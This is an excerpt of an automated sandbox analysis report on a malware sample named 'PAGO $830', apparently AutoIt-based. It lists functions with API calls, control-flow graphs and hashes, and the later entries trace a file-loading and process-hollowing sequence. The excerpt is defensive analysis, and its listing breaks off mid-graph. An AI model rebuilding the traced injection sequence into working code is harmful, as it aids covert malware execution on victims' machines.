                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00D7545B
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00DB3EEC
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00DB3F2D
                                                          • RegCloseKey.ADVAPI32(?), ref: 00DB3F6F
                                                          • _wcslen.LIBCMT ref: 00DB3FD6
                                                          • _wcslen.LIBCMT ref: 00DB3FE5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                          • API String ID: 98802146-2727554177
                                                          • Opcode ID: 0eb73178c0c9846327af2665c914888e4e547d882de2f47eb637fe6f844afc6c
                                                          • Instruction ID: 904703ef30f3108ce90cab3416b2db41f353619aa346077ccee353500ddb7485
                                                          • Opcode Fuzzy Hash: 0eb73178c0c9846327af2665c914888e4e547d882de2f47eb637fe6f844afc6c
                                                          • Instruction Fuzzy Hash: 287195715043019EC304EF66DC819ABBBF8FF96740F84452EF649A31A1EB709949CB72
                                                          Function 00D745AE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00D745B9
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00D745C8
                                                          • LoadIconW.USER32(00000063), ref: 00D745DE
                                                          • LoadIconW.USER32(000000A4), ref: 00D745F0
                                                          • LoadIconW.USER32(000000A2), ref: 00D74602
                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D7461A
                                                          • RegisterClassExW.USER32(?), ref: 00D7466B
                                                            • Part of subcall function 00D746FF: GetSysColorBrush.USER32(0000000F), ref: 00D74732
                                                            • Part of subcall function 00D746FF: RegisterClassExW.USER32(00000030), ref: 00D7475C
                                                            • Part of subcall function 00D746FF: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D7476D
                                                            • Part of subcall function 00D746FF: InitCommonControlsEx.COMCTL32(?), ref: 00D7478A
                                                            • Part of subcall function 00D746FF: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D7479A
                                                            • Part of subcall function 00D746FF: LoadIconW.USER32(000000A9), ref: 00D747B0
                                                            • Part of subcall function 00D746FF: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D747BF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                          • String ID: #$0$AutoIt v3
                                                          • API String ID: 423443420-4155596026
                                                          • Opcode ID: c10114f35ba59bbb02aa592eab4392f428909fdfa5faab2b0e657a3d20e35c81
                                                          • Instruction ID: 3a51c8d0c56b62998e718cc9047af63a8f48b08aa85afe13c95b53346c820bea
                                                          • Opcode Fuzzy Hash: c10114f35ba59bbb02aa592eab4392f428909fdfa5faab2b0e657a3d20e35c81
                                                          • Instruction Fuzzy Hash: 90216A78E40314AFCB009FA7EC45BA97FB4FB49B40F15009AE500B26A0D3B1058ACF90
                                                          Function 00D7D010 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 00D7D44E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Init_thread_footer
                                                          • String ID: p#$p#$p#$p#$p%$p%$x#$x#
                                                          • API String ID: 1385522511-4136154834
                                                          • Opcode ID: 0e3e357f91bd6c67ce9e5053f4477dbb2b3bba14b139909070c28330d1b215e9
                                                          • Instruction ID: e566ff3ff02b90d34d7e54cd3c2cb87167adc6d232647315298dc9b4e015b3a8
                                                          • Opcode Fuzzy Hash: 0e3e357f91bd6c67ce9e5053f4477dbb2b3bba14b139909070c28330d1b215e9
                                                          • Instruction Fuzzy Hash: DE328B74A04206DFCB24CF54C884BBA7BB6EF45314F29805DE949AB251E774ED82CBB1
                                                          Function 00D74B9B Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 716 d74b9b-d74bb0 717 d74bb2-d74bb5 716->717 718 d74c10-d74c12 716->718 720 d74bb7-d74bbe 717->720 721 d74c16 717->721 718->717 719 d74c14 718->719 722 d74bfb-d74c03 DefWindowProcW 719->722 725 d74bc4-d74bc9 720->725 726 d74c90-d74c98 PostQuitMessage 720->726 723 db39dd-db3a05 call d731ed call d8e48c 721->723 724 d74c1c-d74c21 721->724 727 d74c09-d74c0f 722->727 758 db3a0a-db3a11 723->758 729 d74c23-d74c26 724->729 730 d74c48-d74c6f SetTimer RegisterWindowMessageW 724->730 732 db3a5e-db3a72 call ddbe4e 725->732 733 d74bcf-d74bd3 725->733 728 d74c44-d74c46 726->728 728->727 734 db397e-db3981 729->734 735 d74c2c-d74c3f KillTimer call d74b1d call d75adb 729->735 730->728 737 d74c71-d74c7c CreatePopupMenu 730->737 732->728 749 db3a78 732->749 738 db3a4a-db3a59 call ddc07f 733->738 739 d74bd9-d74bde 733->739 741 db39b9-db39d8 MoveWindow 734->741 742 db3983-db3987 734->742 735->728 737->728 738->728 746 d74be4-d74be9 739->746 747 db3a2f-db3a36 739->747 741->728 750 db3989-db398c 742->750 751 db39a8-db39b4 SetFocus 742->751 756 d74bef-d74bf5 746->756 757 d74c7e-d74c8e call d74c9a 746->757 747->722 752 db3a3c-db3a45 call dd0a1b 747->752 749->722 750->756 759 db3992-db39a3 call d731ed 750->759 751->728 752->722 756->722 756->758 757->728 758->722 764 db3a17-db3a2a call d74b1d call d756c2 758->764 759->728 764->722
                                                          APIs
                                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00D74B95,?,?), ref: 00D74C03
                                                          • KillTimer.USER32(?,00000001,?,?,?,?,?,00D74B95,?,?), ref: 00D74C2F
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D74C52
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00D74B95,?,?), ref: 00D74C5D
                                                          • CreatePopupMenu.USER32 ref: 00D74C71
                                                          • PostQuitMessage.USER32(00000000), ref: 00D74C92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                          • String ID: TaskbarCreated
                                                          • API String ID: 129472671-2362178303
                                                          • Opcode ID: 63713a18d09022743cc39e0a1cadf7f0207b4566bcbf3cbc579e3478d9155489
                                                          • Instruction ID: 4464c925bacc6538c4745ebcfdea8351af7d577c206dcabf5fd1e5625541e237
                                                          • Opcode Fuzzy Hash: 63713a18d09022743cc39e0a1cadf7f0207b4566bcbf3cbc579e3478d9155489
                                                          • Instruction Fuzzy Hash: 9B415834244104AFDF1B1F3D9D0ABB83A15EB45340F2C8266F55EA62A0EB71CD859B72
                                                          Function 00D7F8D0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: D%$D%$D%$D%$D%$Variable must be of type 'Object'.
                                                          • API String ID: 0-2799515523
                                                          • Opcode ID: 0f2023bc71229f5490ac2abbbcb104603dcadcd1e4b13178a98e5f67ccb8758e
                                                          • Instruction ID: 373e9909c49d77660e4ff0e137b894fb470c23ca6f51de8fef9af21004244f12
                                                          • Opcode Fuzzy Hash: 0f2023bc71229f5490ac2abbbcb104603dcadcd1e4b13178a98e5f67ccb8758e
                                                          • Instruction Fuzzy Hash: 4EC27971A00205CFCB24DF58C895BADB7B1FF49310F28816AE949AB391E375AD45CBB1
                                                          Function 013C1048 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1282 13c1048-13c10f6 call 13bea58 1285 13c10fd-13c1123 call 13c1f58 CreateFileW 1282->1285 1288 13c112a-13c113a 1285->1288 1289 13c1125 1285->1289 1296 13c113c 1288->1296 1297 13c1141-13c115b VirtualAlloc 1288->1297 1290 13c1275-13c1279 1289->1290 1291 13c12bb-13c12be 1290->1291 1292 13c127b-13c127f 1290->1292 1298 13c12c1-13c12c8 1291->1298 1294 13c128b-13c128f 1292->1294 1295 13c1281-13c1284 1292->1295 1299 13c129f-13c12a3 1294->1299 1300 13c1291-13c129b 1294->1300 1295->1294 1296->1290 1301 13c115d 1297->1301 1302 13c1162-13c1179 ReadFile 1297->1302 1303 13c131d-13c1332 1298->1303 1304 13c12ca-13c12d5 1298->1304 1309 13c12a5-13c12af 1299->1309 1310 13c12b3 1299->1310 1300->1299 1301->1290 1311 13c117b 1302->1311 1312 13c1180-13c11c0 VirtualAlloc 1302->1312 1307 13c1334-13c133f VirtualFree 1303->1307 1308 13c1342-13c134a 1303->1308 1305 13c12d9-13c12e5 1304->1305 1306 13c12d7 1304->1306 1313 13c12f9-13c1305 1305->1313 1314 13c12e7-13c12f7 1305->1314 1306->1303 1307->1308 1309->1310 1310->1291 1311->1290 1315 13c11c7-13c11e2 call 13c21a8 1312->1315 1316 13c11c2 1312->1316 1319 13c1307-13c1310 1313->1319 1320 13c1312-13c1318 1313->1320 1318 13c131b 1314->1318 1322 13c11ed-13c11f7 1315->1322 1316->1290 1318->1298 1319->1318 1320->1318 1323 13c11f9-13c1228 call 13c21a8 1322->1323 1324 13c122a-13c123e call 13c1fb8 1322->1324 1323->1322 1330 13c1240 1324->1330 1331 13c1242-13c1246 1324->1331 1330->1290 1332 13c1248-13c124c CloseHandle 1331->1332 1333 13c1252-13c1256 1331->1333 1332->1333 1334 13c1258-13c1263 VirtualFree 1333->1334 1335 13c1266-13c126f 1333->1335 1334->1335 1335->1285 1335->1290
                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 013C1119
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 013C133F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046765974.00000000013BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 013BE000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_13be000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CreateFileFreeVirtual
                                                          • String ID:
                                                          • API String ID: 204039940-0
                                                          • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                          • Instruction ID: f263bf7aee1094af73e29732c74c659f40a83b7a71d8b7f75ff0dad458310385
                                                          • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                          • Instruction Fuzzy Hash: 07A1F974E00209EBDF14CFA4C894BEEBBB5BF48708F208159E615BB281D7759E41DB54
                                                          Function 00D7468E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1346 d7468e-d746fe CreateWindowExW * 2 ShowWindow * 2
                                                          APIs
                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D746BC
                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D746DD
                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D736D8,?), ref: 00D746F1
                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D736D8,?), ref: 00D746FA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$CreateShow
                                                          • String ID: AutoIt v3$edit
                                                          • API String ID: 1584632944-3779509399
                                                          • Opcode ID: 3493e0fcfee4e95b7f5de985d09b8b58334ea3ad0ab2ee5cda75f78867a5e0b6
                                                          • Instruction ID: 1aa6cb56de55ffce0d0e474eb9d0151285b026f05b8252cc265afc9712e38d40
                                                          • Opcode Fuzzy Hash: 3493e0fcfee4e95b7f5de985d09b8b58334ea3ad0ab2ee5cda75f78867a5e0b6
                                                          • Instruction Fuzzy Hash: BDF0D0799403907EEF311B27AC09E7B2EBDD7C7F50B15009AF904B25A0C661189ADA70
                                                          Function 013C0E08 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1461 13c0e08-13c0f47 call 13bea58 call 13c0cf8 CreateFileW 1468 13c0f4e-13c0f5e 1461->1468 1469 13c0f49 1461->1469 1472 13c0f65-13c0f7f VirtualAlloc 1468->1472 1473 13c0f60 1468->1473 1470 13c0ffe-13c1003 1469->1470 1474 13c0f81 1472->1474 1475 13c0f83-13c0f9a ReadFile 1472->1475 1473->1470 1474->1470 1476 13c0f9c 1475->1476 1477 13c0f9e-13c0fd8 call 13c0d38 call 13bfcf8 1475->1477 1476->1470 1482 13c0fda-13c0fef call 13c0d88 1477->1482 1483 13c0ff4-13c0ffc ExitProcess 1477->1483 1482->1483 1483->1470
                                                          APIs
                                                            • Part of subcall function 013C0CF8: Sleep.KERNELBASE(000001F4), ref: 013C0D09
                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 013C0F3D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046765974.00000000013BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 013BE000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_13be000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CreateFileSleep
                                                          • String ID: XGQYZ2O4Y0PQZI525XLHBZX3CN04CB
                                                          • API String ID: 2694422964-3263489077
                                                          • Opcode ID: 5f05079814dbf193bf6b722ae298860c964ebb340bc594f08d4dd5acff1f8ed4
                                                          • Instruction ID: 53d3387c70cf77a5650ceba6ad0b15fec8fad1d0feca1cf2f927ff85bcff700a
                                                          • Opcode Fuzzy Hash: 5f05079814dbf193bf6b722ae298860c964ebb340bc594f08d4dd5acff1f8ed4
                                                          • Instruction Fuzzy Hash: 45618530D0428DDAEF12D7B8C858BDEBBB9AF15704F044199E6487B2C1C7B91B89CB65
                                                          Function 00DE2865 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1485 de2865-de28d7 call db1ef0 call de24f4 call d8fd8b call d770c2 call de266c call d76abf call d951c2 1500 de28dd-de28e4 call de2d84 1485->1500 1501 de298a-de2991 call de2d84 1485->1501 1506 de28ea-de2988 call d9d513 call d94913 call d98fc8 call d9d513 call d98fc8 * 2 1500->1506 1507 de2993-de2995 1500->1507 1501->1507 1508 de299a 1501->1508 1511 de299d-de2a58 call d76a95 * 8 call de2f35 call d9e57b 1506->1511 1510 de2bd4-de2bd5 1507->1510 1508->1511 1512 de2bf3-de2bf9 1510->1512 1550 de2a5a-de2a5c 1511->1550 1551 de2a61-de2a7c call de26b0 1511->1551 1515 de2c0e-de2c14 1512->1515 1516 de2bfb-de2c0b call d8fd4d call d8fd94 1512->1516 1516->1515 1550->1510 1554 de2b0e-de2b1a call d9e608 1551->1554 1555 de2a82-de2a8a 1551->1555 1562 de2b1c-de2b2b DeleteFileW 1554->1562 1563 de2b30-de2b34 1554->1563 1556 de2a8c-de2a90 1555->1556 1557 de2a92 1555->1557 1559 de2a97-de2ab5 call d76a95 1556->1559 1557->1559 1569 de2adf-de2af5 call de203b call d9db43 1559->1569 1570 de2ab7-de2abc 1559->1570 1562->1510 1565 de2baf-de2bc3 CopyFileW 1563->1565 1566 de2b36-de2b9c call de24f4 call d9d27b * 2 call de21ec 1563->1566 1567 de2bd7-de2bed DeleteFileW call de2ef6 1565->1567 1568 de2bc5-de2bd2 DeleteFileW 1565->1568 1566->1567 1590 de2b9e-de2bad DeleteFileW 1566->1590 1576 de2bf2 1567->1576 1568->1510 1585 de2afa-de2b05 1569->1585 1573 de2abf-de2ad2 call de27f0 1570->1573 1583 de2ad4-de2add 1573->1583 1576->1512 1583->1569 1585->1555 1587 de2b0b 1585->1587 1587->1554 1590->1510
                                                          APIs
                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DE2B23
                                                          • DeleteFileW.KERNEL32(?), ref: 00DE2BA5
                                                          • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DE2BBB
                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DE2BCC
                                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DE2BDE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: File$Delete$Copy
                                                          • String ID:
                                                          • API String ID: 3226157194-0
                                                          • Opcode ID: b869319240a59c072fe6da60a41b939e6b882a848f0cf5917a97dde1832222e9
                                                          • Instruction ID: 867f58dfcb6c04e863d5140555436838e4acd572b299c5cc678637eb9b8322c0
                                                          • Opcode Fuzzy Hash: b869319240a59c072fe6da60a41b939e6b882a848f0cf5917a97dde1832222e9
                                                          • Instruction Fuzzy Hash: 8EB16071900219ABDF25EFA5CC85EEEB7BDEF49310F1440A6F609E6145EA30AA44CF71
                                                          Function 00D759A7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1865 d759a7-d759b2 1866 d75a24-d75a26 1865->1866 1867 d759b4-d759b9 1865->1867 1869 d75a17-d75a1a 1866->1869 1867->1866 1868 d759bb-d759d3 RegOpenKeyExW 1867->1868 1868->1866 1870 d759d5-d759f4 RegQueryValueExW 1868->1870 1871 d759f6-d75a01 1870->1871 1872 d75a0b-d75a16 RegCloseKey 1870->1872 1873 d75a03-d75a05 1871->1873 1874 d75a1b-d75a22 1871->1874 1872->1869 1875 d75a09 1873->1875 1874->1875 1875->1872
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00D7599A,SwapMouseButtons,00000004,?), ref: 00D759CB
                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00D7599A,SwapMouseButtons,00000004,?), ref: 00D759EC
                                                          • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00D7599A,SwapMouseButtons,00000004,?), ref: 00D75A0E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: Control Panel\Mouse
                                                          • API String ID: 3677997916-824357125
                                                          • Opcode ID: 68d777c0a7cd8f4ffe5b0de83bd002b6fb610e87cef3ef523de740888b5ba437
                                                          • Instruction ID: fe01f4ec410dfe121f04092f17d9381035582281d4201b1bca85e748e61197cc
                                                          • Opcode Fuzzy Hash: 68d777c0a7cd8f4ffe5b0de83bd002b6fb610e87cef3ef523de740888b5ba437
                                                          • Instruction Fuzzy Hash: B6117C71520608FFDB208F64EC85EAFBBB8EF40740B108629F809E7114E271AE44DB60
                                                          Function 013BFCF8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1876 13bfcf8-13bfd98 call 13c2188 * 3 1883 13bfd9a-13bfda4 1876->1883 1884 13bfdaf 1876->1884 1883->1884 1885 13bfda6-13bfdad 1883->1885 1886 13bfdb6-13bfdbf 1884->1886 1885->1886 1887 13bfdc6-13c0478 1886->1887 1888 13c047a-13c047e 1887->1888 1889 13c048b-13c04b8 CreateProcessW 1887->1889 1890 13c04c4-13c04f1 1888->1890 1891 13c0480-13c0484 1888->1891 1896 13c04ba-13c04bd 1889->1896 1897 13c04c2 1889->1897 1912 13c04fb 1890->1912 1913 13c04f3-13c04f6 1890->1913 1892 13c04fd-13c052a 1891->1892 1893 13c0486 1891->1893 1895 13c0534-13c054e Wow64GetThreadContext 1892->1895 1915 13c052c-13c052f 1892->1915 1893->1895 1900 13c0555-13c0570 ReadProcessMemory 1895->1900 1901 13c0550 1895->1901 1902 13c08b9-13c08bb 1896->1902 1897->1895 1904 13c0577-13c0580 1900->1904 1905 13c0572 1900->1905 1903 13c0862-13c0866 1901->1903 1910 13c0868-13c086c 1903->1910 1911 13c08b7 1903->1911 1908 13c05a9-13c05c8 call 13c1808 1904->1908 1909 13c0582-13c0591 1904->1909 1905->1903 1924 13c05cf-13c05f2 call 13c1948 1908->1924 1925 13c05ca 1908->1925 1909->1908 1916 13c0593-13c05a2 call 13c1758 1909->1916 1917 13c086e-13c087a 1910->1917 1918 13c0881-13c0885 1910->1918 1911->1902 1912->1895 1913->1902 1915->1902 1916->1908 1932 13c05a4 1916->1932 1917->1918 1920 13c0887-13c088a 1918->1920 1921 13c0891-13c0895 1918->1921 1920->1921 1926 13c0897-13c089a 1921->1926 1927 13c08a1-13c08a5 1921->1927 1935 13c063c-13c065d call 13c1948 1924->1935 1936 13c05f4-13c05fb 1924->1936 1925->1903 1926->1927 1930 13c08a7-13c08ad call 13c1758 1927->1930 1931 13c08b2-13c08b5 1927->1931 1930->1931 1931->1902 1932->1903 1942 13c065f 1935->1942 1943 13c0664-13c0682 call 13c21a8 1935->1943 1937 13c05fd-13c062e call 13c1948 1936->1937 1938 13c0637 1936->1938 1946 13c0635 1937->1946 1947 13c0630 1937->1947 1938->1903 1942->1903 1949 13c068d-13c0697 1943->1949 1946->1935 1947->1903 1950 13c06cd-13c06d1 1949->1950 1951 13c0699-13c06cb call 13c21a8 1949->1951 1953 13c07bc-13c07d9 call 13c1358 1950->1953 1954 13c06d7-13c06e7 1950->1954 1951->1949 1961 13c07db 1953->1961 1962 13c07e0-13c07ff Wow64SetThreadContext 1953->1962 1954->1953 1957 13c06ed-13c06fd 1954->1957 1957->1953 1960 13c0703-13c0727 1957->1960 1963 13c072a-13c072e 1960->1963 1961->1903 1964 13c0801 1962->1964 1965 13c0803-13c080e call 13c1688 1962->1965 1963->1953 1966 13c0734-13c0749 1963->1966 1964->1903 1974 13c0810 1965->1974 1975 13c0812-13c0816 1965->1975 1968 13c075d-13c0761 1966->1968 1969 13c079f-13c07b7 1968->1969 1970 13c0763-13c076f 1968->1970 1969->1963 1972 